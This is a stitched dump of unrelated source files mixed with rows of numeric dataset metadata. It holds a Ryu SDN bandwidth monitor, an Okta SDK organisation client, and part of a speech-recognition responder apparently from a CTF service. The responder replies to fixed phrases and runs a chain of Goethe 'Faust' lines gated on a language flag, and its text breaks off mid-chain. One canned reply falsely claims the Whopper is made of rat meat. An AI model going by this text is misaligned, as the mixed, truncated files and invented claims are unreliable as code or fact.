| 37.395335 | 123 | 0.653496 | 9,668 | 60,917 | 3.977555 | 0.021928 | 0.044416 | 0.068964 | 0.04868 | 0.938838 | 0.93036 | 0.919074 | 0.908178 | 0.891848 | 0.88415 | 0 | 0.027663 | 0.210762 | 60,917 | 1,628 | 124 | 37.418305 | 0.772183 | 0.194511 | 0 | 0.841283 | 0 | 0 | 0.006968 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.027138 | false | 0 | 0.004934 | 0 | 0.066612 | 0.001645 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
db3c02fdb929ef66f0f988d3be954192e602757e | 15,235 | py | Python | myapp/observed_state.py | hebinjie33/HMMLB | db26a149fd3e8e96a570cfe32e9bc42a002409cc | [
"Apache-2.0"
] | null | null | null | myapp/observed_state.py | hebinjie33/HMMLB | db26a149fd3e8e96a570cfe32e9bc42a002409cc | [
"Apache-2.0"
] | null | null | null | myapp/observed_state.py | hebinjie33/HMMLB | db26a149fd3e8e96a570cfe32e9bc42a002409cc | [
"Apache-2.0"
] | 1 | 2019-12-16T21:46:46.000Z | 2019-12-16T21:46:46.000Z | import httplib2
import time
import json
"""
The S7_Port1 total bandwidth is 1 Gbit/s.
The S4_Port2 total bandwidth is 1 Gbit/s.
The S5_Port2 total bandwidth is 1 Gbit/s.
The S6_Port2 total bandwidth is 1 Gbit/s.
This setting reflects that the experimental topology is only one part of a
fat-tree: we account for the effect of the other parts of the fat-tree in
order to demonstrate the performance of the HMM algorithm.
"""
class ryu_bandwidth_monitor:
url = ''
    data_before = [0 for i in range(13)]  # tx-byte samples, indices 0~12, in order: S7-PORT2 S5-PORT1 S1-PORT2 S9-PORT4 S11-PORT3 S5-PORT2 S2-PORT4 S7-PORT1 S6-PORT1 S3-PORT1 S10-PORT3 S6-PORT2 S4-PORT2 (index 12 is reused for the flow byte count)
    data_after = [0 for i in range(13)]  # link1 uses indices 0 1 2 3 4, link2 uses 0 5 6 3 4, link3 uses 7 8 9 10 4, link4 uses 7 11 12 10 4
def __init__(self, host, port):
self.url = 'http://' + host + ':' + str(port) + '/index.html'
    # Per-host flow lookup: src_ip -> (switch DPID, flow cookie). Revise this
    # table and the hard-coded controller URL if the topology changes.
    FLOW_MAP = {
        '10.0.0.1': ('7', 10), '10.0.0.2': ('7', 11),
        '10.0.0.3': ('8', 11), '10.0.0.4': ('8', 10),
        '10.0.0.5': ('11', 11), '10.0.0.6': ('11', 10),
        '10.0.0.7': ('12', 10), '10.0.0.8': ('12', 11),
    }
    def get_flow_rate_before(self, src_ip):
        # Record the byte counter of src_ip's flow before the sampling window.
        if src_ip not in self.FLOW_MAP:
            return
        dpid, cookie = self.FLOW_MAP[src_ip]
        http = httplib2.Http()
        headers = {'Accept': 'application/json'}
        response, content = http.request(uri='http://192.168.93.137:8080/stats/flow/' + dpid, headers=headers)
        data = json.loads(content.decode())
        k = 0
        while data[dpid][k]['cookie'] != cookie:
            k = k + 1
        self.data_before[12] = data[dpid][k]['byte_count']
        #print(self.data_before[12])
    def get_flow_rate_after(self, src_ip):
        # Record the byte counter of src_ip's flow after the sampling window.
        if src_ip not in self.FLOW_MAP:
            return
        dpid, cookie = self.FLOW_MAP[src_ip]
        http = httplib2.Http()
        headers = {'Accept': 'application/json'}
        response, content = http.request(uri='http://192.168.93.137:8080/stats/flow/' + dpid, headers=headers)
        data = json.loads(content.decode())
        k = 0
        while data[dpid][k]['cookie'] != cookie:
            k = k + 1
        self.data_after[12] = data[dpid][k]['byte_count']
        #print(self.data_after[12])
    def calculate_flow_rate(self, time):
        # Flow rate in bit/s across the sampling window of `time` seconds.
        flow_rate = float((self.data_after[12] - self.data_before[12]) * 8 / time)
        return flow_rate
def get_databefore(self,src_ip):
http = httplib2.Http()
headers = {'Accept': 'application/json'}
if(src_ip == '10.0.0.1' or src_ip == '10.0.0.2' or src_ip == '10.0.0.3' or src_ip == '10.0.0.4'):
if(src_ip == '10.0.0.1' or src_ip == '10.0.0.2'):
response, content = http.request(uri='http://192.168.93.137:8080/stats/port/7/1', headers=headers) #S7_Port1
json_data = content.decode()
data = json.loads(json_data)
self.data_before[0] = data['7'][0]['tx_bytes']
if(src_ip == '10.0.0.3' or src_ip == '10.0.0.4'):
response, content = http.request(uri='http://192.168.93.137:8080/stats/port/8/1', headers=headers) #S8_Port1
json_data = content.decode()
data = json.loads(json_data)
self.data_before[0] = data['8'][0]['tx_bytes']
response, content = http.request(uri='http://192.168.93.137:8080/stats/port/5/2', headers=headers) #S5_Port2
json_data = content.decode()
data = json.loads(json_data)
self.data_before[3] = data['5'][0]['tx_bytes']
response, content = http.request(uri='http://192.168.93.137:8080/stats/port/6/2', headers=headers) #S6_Port2
json_data = content.decode()
data = json.loads(json_data)
self.data_before[5] = data['6'][0]['tx_bytes']
response, content = http.request(uri='http://192.168.93.137:8080/stats/port/4/3', headers=headers) #S4_Port3
json_data = content.decode()
data = json.loads(json_data)
self.data_before[9] = data['4'][0]['tx_bytes']
if(src_ip == '10.0.0.5' or src_ip == '10.0.0.6' or src_ip == '10.0.0.7' or src_ip == '10.0.0.8'):
if(src_ip == '10.0.0.5' or src_ip == '10.0.0.6'):
response, content = http.request(uri='http://192.168.93.137:8080/stats/port/11/1', headers=headers) #S11_Port1
json_data = content.decode()
data = json.loads(json_data)
self.data_before[0] = data['11'][0]['tx_bytes']
if(src_ip == '10.0.0.7' or src_ip == '10.0.0.8'):
response, content = http.request(uri='http://192.168.93.137:8080/stats/port/12/1', headers=headers) #S12_Port1
json_data = content.decode()
data = json.loads(json_data)
self.data_before[0] = data['12'][0]['tx_bytes']
response, content = http.request(uri='http://192.168.93.137:8080/stats/port/9/2', headers=headers) #S9_Port2
json_data = content.decode()
data = json.loads(json_data)
self.data_before[3] = data['9'][0]['tx_bytes']
response, content = http.request(uri='http://192.168.93.137:8080/stats/port/10/2', headers=headers) #S10_Port2
json_data = content.decode()
data = json.loads(json_data)
self.data_before[5] = data['10'][0]['tx_bytes']
response, content = http.request(uri='http://192.168.93.137:8080/stats/port/4/4', headers=headers) #S4_Port4
json_data = content.decode()
data = json.loads(json_data)
self.data_before[9] = data['4'][0]['tx_bytes']
def get_dataafter(self,src_ip):
http = httplib2.Http()
headers = {'Accept': 'application/json'}
if(src_ip == '10.0.0.1' or src_ip == '10.0.0.2' or src_ip == '10.0.0.3' or src_ip == '10.0.0.4'):
if(src_ip == '10.0.0.1' or src_ip == '10.0.0.2'):
response, content = http.request(uri='http://192.168.93.137:8080/stats/port/7/1', headers=headers) #S7_Port1
json_data = content.decode()
data = json.loads(json_data)
self.data_after[0] = data['7'][0]['tx_bytes']
if(src_ip == '10.0.0.3' or src_ip == '10.0.0.4'):
response, content = http.request(uri='http://192.168.93.137:8080/stats/port/8/1', headers=headers) #S8_Port1
json_data = content.decode()
data = json.loads(json_data)
self.data_after[0] = data['8'][0]['tx_bytes']
response, content = http.request(uri='http://192.168.93.137:8080/stats/port/5/2', headers=headers) #S5_Port2
json_data = content.decode()
data = json.loads(json_data)
self.data_after[3] = data['5'][0]['tx_bytes']
response, content = http.request(uri='http://192.168.93.137:8080/stats/port/6/2', headers=headers) #S6_Port2
json_data = content.decode()
data = json.loads(json_data)
self.data_after[5] = data['6'][0]['tx_bytes']
response, content = http.request(uri='http://192.168.93.137:8080/stats/port/4/3', headers=headers) #S4_Port3
json_data = content.decode()
data = json.loads(json_data)
self.data_after[9] = data['4'][0]['tx_bytes']
if(src_ip == '10.0.0.5' or src_ip == '10.0.0.6' or src_ip == '10.0.0.7' or src_ip == '10.0.0.8'):
if(src_ip == '10.0.0.5' or src_ip == '10.0.0.6'):
response, content = http.request(uri='http://192.168.93.137:8080/stats/port/11/1', headers=headers) #S11_Port1
json_data = content.decode()
data = json.loads(json_data)
self.data_after[0] = data['11'][0]['tx_bytes']
if(src_ip == '10.0.0.7' or src_ip == '10.0.0.8'):
response, content = http.request(uri='http://192.168.93.137:8080/stats/port/12/1', headers=headers) #S12_Port1
json_data = content.decode()
data = json.loads(json_data)
self.data_after[0] = data['12'][0]['tx_bytes']
response, content = http.request(uri='http://192.168.93.137:8080/stats/port/9/2', headers=headers) #S9_Port2
json_data = content.decode()
data = json.loads(json_data)
self.data_after[3] = data['9'][0]['tx_bytes']
response, content = http.request(uri='http://192.168.93.137:8080/stats/port/10/2', headers=headers) #S10_Port2
json_data = content.decode()
data = json.loads(json_data)
self.data_after[5] = data['10'][0]['tx_bytes']
response, content = http.request(uri='http://192.168.93.137:8080/stats/port/4/4', headers=headers) #S4_Port4
json_data = content.decode()
data = json.loads(json_data)
self.data_after[9] = data['4'][0]['tx_bytes']
    def calculate(self, time):
        # Map the sampled tx-byte counters to four observed load states.
        #file = open('/home/ryu/myapp/observed_state.txt','w')
        port_rate_1 = float((self.data_after[0] - self.data_before[0]) * 8 / time)  # port indices are documented on data_before above
if((port_rate_1/100000000) <= 0.2):
p1 = 1
if(0.2<(port_rate_1/100000000) <0.5 ):
p1 = 2
if((port_rate_1/100000000) >= 0.5):
p1 = 3
port_rate_4 = float((self.data_after[3]-self.data_before[3])*8/time)
if((port_rate_4/100000000) <= 0.2):
p4 = 1
if(0.2<(port_rate_4/100000000) <0.5 ):
p4 = 2
if((port_rate_4/100000000) >= 0.5):
p4 = 3
port_rate_6 = float((self.data_after[5]-self.data_before[5])*8/time)
if((port_rate_6/100000000) <= 0.2):
p6 = 1
if(0.2<(port_rate_6/100000000) <0.5 ):
p6 = 2
if((port_rate_6/100000000) >= 0.5):
p6 = 3
port_rate_10 = float((self.data_after[9]-self.data_before[9])*8/time)
if((port_rate_10/100000000) <= 0.2):
p10 = 1
if(0.2<(port_rate_10/100000000) <0.5 ):
p10 = 2
if((port_rate_10/100000000) >= 0.5):
p10 = 3
print(port_rate_1,port_rate_10,port_rate_4,port_rate_6)
print(p1,p10,p4,p6)
return p1,p10,p4,p6
#ryu = ryu_bandwidth_monitor('192.168.93.137', '8080')
#a = time.time()
#ryu.get_databefore('10.0.0.3')
#time.sleep(0.1)
#b = time.time()
#total = b - a
#ryu.get_dataafter('10.0.0.3')
#ryu.calculate(0.1)
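# A minimal sketch, not in the original module: calculate() above repeats
# the same three-way thresholding for all four ports. A helper like this
# could replace each block (e.g. p1 = _rate_state(port_rate_1)); the 1e8
# divisor and the 0.2/0.5 cut-offs are copied verbatim from calculate():
def _rate_state(port_rate):
    """Bucket a port rate in bit/s into observed states 1 (low) to 3 (high)."""
    utilization = port_rate / 100000000
    if utilization <= 0.2:
        return 1
    if utilization >= 0.5:
        return 3
    return 2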
| 40.092105 | 204 | 0.608008 | 2,497 | 15,235 | 3.5835 | 0.056468 | 0.064372 | 0.022351 | 0.042915 | 0.889808 | 0.886455 | 0.870697 | 0.847005 | 0.836612 | 0.836612 | 0 | 0.122536 | 0.210962 | 15,235 | 379 | 205 | 40.197889 | 0.621828 | 0.111979 | 0 | 0.768116 | 0 | 0 | 0.186368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.01087 | null | null | 0.007246 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
db995ae1c55ff2d45a31b544d9434f9afc493d15 | 21,125 | py | Python | okta/resource_clients/org_client.py | ander501/okta-sdk-python | 0927dc6a2f6d5ebf7cd1ea806d81065094c92471 | [
"Apache-2.0"
] | null | null | null | okta/resource_clients/org_client.py | ander501/okta-sdk-python | 0927dc6a2f6d5ebf7cd1ea806d81065094c92471 | [
"Apache-2.0"
] | null | null | null | okta/resource_clients/org_client.py | ander501/okta-sdk-python | 0927dc6a2f6d5ebf7cd1ea806d81065094c92471 | [
"Apache-2.0"
] | null | null | null | """
Copyright 2020 - Present Okta, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# AUTO-GENERATED! DO NOT EDIT FILE DIRECTLY
# SEE CONTRIBUTOR DOCUMENTATION
from okta.models.org_setting\
import OrgSetting
from okta.models.org_contact_type_obj\
import OrgContactTypeObj
from okta.models.org_contact_user\
import OrgContactUser
from okta.models.org_preferences\
import OrgPreferences
from okta.models.org_okta_communication_setting\
import OrgOktaCommunicationSetting
from okta.models.org_okta_support_settings_obj\
import OrgOktaSupportSettingsObj
from okta.utils import format_url
from okta.api_client import APIClient
class OrgClient(APIClient):
"""
A Client object for the Org resource.
"""
def __init__(self):
self._base_url = ""
async def get_org_settings(
self,
keep_empty_params=False
):
"""
Get settings of your organization.
Args:
Returns:
OrgSetting
"""
http_method = "get".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/org
""")
body = {}
headers = {}
form = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers, form, keep_empty_params=keep_empty_params
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, OrgSetting)
if error:
return (None, response, error)
try:
result = OrgSetting(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def partial_update_org_setting(
self, org_setting,
keep_empty_params=False
):
"""
Partial update settings of your organization.
Args:
{org_setting}
Returns:
OrgSetting
"""
http_method = "post".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/org
""")
if isinstance(org_setting, dict):
body = org_setting
else:
body = org_setting.as_dict()
headers = {
"Accept": "application/json",
"Content-Type": "application/json"
}
form = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers, form, keep_empty_params=keep_empty_params
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, OrgSetting)
if error:
return (None, response, error)
try:
result = OrgSetting(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def update_org_setting(
self, org_setting,
keep_empty_params=False
):
"""
Update settings of your organization.
Args:
{org_setting}
Returns:
OrgSetting
"""
http_method = "put".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/org
""")
if isinstance(org_setting, dict):
body = org_setting
else:
body = org_setting.as_dict()
headers = {
"Accept": "application/json",
"Content-Type": "application/json"
}
form = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers, form, keep_empty_params=keep_empty_params
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, OrgSetting)
if error:
return (None, response, error)
try:
result = OrgSetting(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def get_org_contact_types(
self,
keep_empty_params=False
):
"""
Gets Contact Types of your organization.
Args:
Returns:
list: Collection of OrgContactTypeObj instances.
"""
http_method = "get".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/org/contacts
""")
body = {}
headers = {}
form = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers, form, keep_empty_params=keep_empty_params
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, OrgContactTypeObj)
if error:
return (None, response, error)
try:
result = []
for item in response.get_body():
result.append(OrgContactTypeObj(
self.form_response_body(item)
))
except Exception as error:
return (None, response, error)
return (result, response, None)
async def get_org_contact_user(
self, contactType,
keep_empty_params=False
):
"""
        Retrieves the URL of the User associated with the
        specified Contact Type.
Args:
contact_type {str}
Returns:
OrgContactUser
"""
http_method = "get".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/org/contacts/{contactType}
""")
body = {}
headers = {}
form = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers, form, keep_empty_params=keep_empty_params
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, OrgContactUser)
if error:
return (None, response, error)
try:
result = OrgContactUser(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def update_org_contact_user(
self, contactType, user_id_string,
keep_empty_params=False
):
"""
Updates the User associated with the specified Contact
Type.
Args:
contact_type {str}
{user_id_string}
Returns:
OrgContactUser
"""
http_method = "put".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/org/contacts/{contactType}
""")
if isinstance(user_id_string, dict):
body = user_id_string
else:
body = user_id_string.as_dict()
headers = {
"Accept": "application/json",
"Content-Type": "application/json"
}
form = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers, form, keep_empty_params=keep_empty_params
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, OrgContactUser)
if error:
return (None, response, error)
try:
result = OrgContactUser(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def update_org_logo(
self, file,
keep_empty_params=False
):
"""
Updates the logo for your organization.
        Args:
            file: the logo image file to upload
"""
http_method = "post".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/org/logo
""")
body = {}
headers = {}
form = {
"file": file,
}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers, form, keep_empty_params=keep_empty_params
)
if error:
return (None, error)
response, error = await self._request_executor\
.execute(request)
if error:
return (response, error)
return (response, None)
async def get_org_preferences(
self,
keep_empty_params=False
):
"""
Gets preferences of your organization.
Args:
Returns:
OrgPreferences
"""
http_method = "get".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/org/preferences
""")
body = {}
headers = {}
form = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers, form, keep_empty_params=keep_empty_params
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, OrgPreferences)
if error:
return (None, response, error)
try:
result = OrgPreferences(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def hide_okta_ui_footer(
self,
keep_empty_params=False
):
"""
        Hide the Okta UI footer for all end users of your
        organization.
Args:
Returns:
OrgPreferences
"""
http_method = "post".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/org/preferences/hideEndUserFooter
""")
body = {}
headers = {}
form = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers, form, keep_empty_params=keep_empty_params
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, OrgPreferences)
if error:
return (None, response, error)
try:
result = OrgPreferences(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def show_okta_ui_footer(
self,
keep_empty_params=False
):
"""
        Makes the Okta UI footer visible for all end users of
        your organization.
Args:
Returns:
OrgPreferences
"""
http_method = "post".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/org/preferences/showEndUserFooter
""")
body = {}
headers = {}
form = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers, form, keep_empty_params=keep_empty_params
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, OrgPreferences)
if error:
return (None, response, error)
try:
result = OrgPreferences(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def get_okta_communication_settings(
self,
keep_empty_params=False
):
"""
Gets Okta Communication Settings of your organization.
Args:
Returns:
OrgOktaCommunicationSetting
"""
http_method = "get".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/org/privacy/oktaCommunication
""")
body = {}
headers = {}
form = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers, form, keep_empty_params=keep_empty_params
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, OrgOktaCommunicationSetting)
if error:
return (None, response, error)
try:
result = OrgOktaCommunicationSetting(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def opt_in_users_to_okta_communication_emails(
self,
keep_empty_params=False
):
"""
        Opts in all users of this org to Okta Communication
        emails.
Args:
Returns:
OrgOktaCommunicationSetting
"""
http_method = "post".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/org/privacy/oktaCommunication/optIn
""")
body = {}
headers = {}
form = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers, form, keep_empty_params=keep_empty_params
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, OrgOktaCommunicationSetting)
if error:
return (None, response, error)
try:
result = OrgOktaCommunicationSetting(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def opt_out_users_from_okta_communication_emails(
self,
keep_empty_params=False
):
"""
Opts out all users of this org from Okta Communication
emails.
Args:
Returns:
OrgOktaCommunicationSetting
"""
http_method = "post".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/org/privacy/oktaCommunication/optOut
""")
body = {}
headers = {}
form = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers, form, keep_empty_params=keep_empty_params
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, OrgOktaCommunicationSetting)
if error:
return (None, response, error)
try:
result = OrgOktaCommunicationSetting(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def get_org_okta_support_settings(
self,
keep_empty_params=False
):
"""
Gets Okta Support Settings of your organization.
Args:
Returns:
OrgOktaSupportSettingsObj
"""
http_method = "get".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/org/privacy/oktaSupport
""")
body = {}
headers = {}
form = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers, form, keep_empty_params=keep_empty_params
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, OrgOktaSupportSettingsObj)
if error:
return (None, response, error)
try:
result = OrgOktaSupportSettingsObj(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def extend_okta_support(
self,
keep_empty_params=False
):
"""
Extends the length of time that Okta Support can access
        your org by 24 hours. This means that 24 hours are
        added to the remaining access time.
Args:
Returns:
OrgOktaSupportSettingsObj
"""
http_method = "post".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/org/privacy/oktaSupport/extend
""")
body = {}
headers = {}
form = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers, form, keep_empty_params=keep_empty_params
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, OrgOktaSupportSettingsObj)
if error:
return (None, response, error)
try:
result = OrgOktaSupportSettingsObj(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def grant_okta_support(
self,
keep_empty_params=False
):
"""
Enables you to temporarily allow Okta Support to access
your org as an administrator for eight hours.
Args:
Returns:
OrgOktaSupportSettingsObj
"""
http_method = "post".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/org/privacy/oktaSupport/grant
""")
body = {}
headers = {}
form = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers, form, keep_empty_params=keep_empty_params
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, OrgOktaSupportSettingsObj)
if error:
return (None, response, error)
try:
result = OrgOktaSupportSettingsObj(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def revoke_okta_support(
self,
keep_empty_params=False
):
"""
Revokes Okta Support access to your organization.
Args:
Returns:
OrgOktaSupportSettingsObj
"""
http_method = "post".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/org/privacy/oktaSupport/revoke
""")
body = {}
headers = {}
form = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers, form, keep_empty_params=keep_empty_params
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, OrgOktaSupportSettingsObj)
if error:
return (None, response, error)
try:
result = OrgOktaSupportSettingsObj(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
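# A minimal usage sketch (illustration only, not part of this generated
# file): resource methods like get_org_settings() are normally reached
# through the SDK's top-level okta.client.Client, which mixes OrgClient in.
# The org URL, token, and the snake_case attribute name below are
# assumptions for the example:
#
# import asyncio
# from okta.client import Client as OktaClient
#
# async def main():
#     client = OktaClient({'orgUrl': 'https://example.okta.com',
#                          'token': 'YOUR_API_TOKEN'})
#     settings, resp, err = await client.get_org_settings()
#     if err is None:
#         print(settings.company_name)
#
# asyncio.run(main())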
| 27.50651 | 90 | 0.553941 | 2,086 | 21,125 | 5.393097 | 0.101151 | 0.065511 | 0.068 | 0.063467 | 0.832444 | 0.805067 | 0.772622 | 0.757244 | 0.740267 | 0.7312 | 0 | 0.002154 | 0.362698 | 21,125 | 767 | 91 | 27.542373 | 0.83347 | 0.031574 | 0 | 0.803536 | 0 | 0 | 0.093502 | 0.024855 | 0 | 0 | 0 | 0 | 0 | 1 | 0.001965 | false | 0 | 0.015717 | 0 | 0.151277 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
db9faf8cf96f9e009d63a14d3fa3d6afcd1b5a78 | 12,278 | py | Python | src/alexacloud/alexa/audioprocessing/speechrecognition.py | fausecteam/faustctf-2017-alexa | 53be850957e88642aaaaffd61360195091aaa35c | [
"0BSD"
] | null | null | null | src/alexacloud/alexa/audioprocessing/speechrecognition.py | fausecteam/faustctf-2017-alexa | 53be850957e88642aaaaffd61360195091aaa35c | [
"0BSD"
] | null | null | null | src/alexacloud/alexa/audioprocessing/speechrecognition.py | fausecteam/faustctf-2017-alexa | 53be850957e88642aaaaffd61360195091aaa35c | [
"0BSD"
] | null | null | null | from django.conf import settings
from pydub import AudioSegment
import speech_recognition as sr
import logging
import random
import os
logger = logging.getLogger(__name__)
couldntUnderstandSentences = [
"Can you repeat that please?",
"I beg your pardon?"
]
dontKnowSentences = [
"I don't know.",
"Seriously?"
]
def recognizeText(audioFile):
r = sr.Recognizer()
try:
with sr.AudioFile(audioFile) as f:
audio = r.record(f)
except (ValueError, AssertionError):
return None
try:
return r.recognize_sphinx(audio)
except sr.UnknownValueError:
# Speech is unrecognizable
return None
except sr.RequestError as e:
# Issues with sphinx installation
logger.error("Sphinx error: {}".format(e))
return None
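# A minimal alternative sketch (not used by this module): the
# speech_recognition package also ships online backends with the same
# calling convention, e.g. the free Google Web Speech API:
#
# def recognize_text_google(audio_file):
#     r = sr.Recognizer()
#     with sr.AudioFile(audio_file) as f:
#         audio = r.record(f)
#     try:
#         return r.recognize_google(audio)
#     except (sr.UnknownValueError, sr.RequestError):
#         return None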
def convertToWav(audioFile):
wavFile = os.path.join(os.path.dirname(audioFile), os.path.basename(audioFile) + ".wav")
try:
segment = AudioSegment.from_file(audioFile)
segment.export(wavFile, format="wav")
return wavFile
except Exception:
return None
def process(mediumPath, contentType, lang):
if contentType not in ['audio/x-wav', 'audio/x-aiff', 'audio/flac']:
# Create temporary wav file
        wavFile = convertToWav(mediumPath)
        # convertToWav returns None on failure, so guard before using the path
        transcript = recognizeText(wavFile) if wavFile else None
        # Delete the temporary file afterwards
        if wavFile:
            os.remove(wavFile)
else:
transcript = recognizeText(mediumPath)
return respond(transcript, lang)
def respond(query, lang):
if query is None:
return random.choice(couldntUnderstandSentences)
query = query.lower()
if query.startswith("ok google"):
return "Google is not here"
if query.startswith("siri"):
return "Siri is not here"
if "what is the whopper" in query:
return "The Whopper is a juicy 100 percent rat meat and toenail clipping hamburger product."
if "wake up" in query:
return "... when September ends ♫"
if query.startswith("peter piper picked a peck of pickled peppers"):
return "Where's the peck of pickled peppers Peter Piper picked?"
if "a knock enter whos plaguing me again" in query and lang == "goethe":
return "i am"
if "i am" in query and lang == "goethe":
return "enter"
if "enter" in query and lang == "goethe":
return "three times you must say it then"
if "three times you must say it then" in query and lang == "goethe":
return "so enter"
if "so enter" in query and lang == "goethe":
return "ah now you please me hope well get along together drive away the gloomy weather dressed like young nobility a scarlet gold-trimmed coat a little silk-lined cloak cockerel feather in my hat a long pointed sword i advise you at that do as i do in a word that footloose fancy free can experience life with me"
if "ah now you please me hope well get along together drive away the gloomy weather dressed like young nobility a scarlet gold-trimmed coat a little silk-lined cloak cockerel feather in my hat a long pointed sword i advise you at that do as i do in a word that footloose fancy free can experience life with me" in query and lang == "goethe":
return "this life of earth its narrowness me however im turned out too old to play about young still to be passionless can the world bring me again you shall you must abstain the eternal song in our ears forever rings one that our whole life long hour hoarsely sings wake in terror with the dawn cry the bitterest tears to see grant no wish of mine not one it passes by on its journey presentiments of joy in wilful depreciation thousand grimaces life employs hinder me in creation when night descends i must out worried on my bed comes to me is never rest some wild dream instead god that lives inside my heart rouse my innermost seeing one enthroned beyond my art stir external being so existence is a burden sated desired and life is hated"
if "this life of earth its narrowness me however im turned out too old to play about young still to be passionless can the world bring me again you shall you must abstain the eternal song in our ears forever rings one that our whole life long hour hoarsely sings wake in terror with the dawn cry the bitterest tears to see grant no wish of mine not one it passes by on its journey presentiments of joy in wilful depreciation thousand grimaces life employs hinder me in creation when night descends i must out worried on my bed comes to me is never rest some wild dream instead god that lives inside my heart rouse my innermost seeing one enthroned beyond my art stir external being so existence is a burden sated desired and life is hated" in query and lang == "goethe":
return "yet deaths a guest whos visits never wholly celebrated"
if "yet deaths a guest whos visits never wholly celebrated" in query and lang == "goethe":
return "happy the man whom victory enhances brow the bloodstained laurel warms after the swift whirling dances himself in some girls arms only in my joy then id sunk down that enrapturing spirit power"
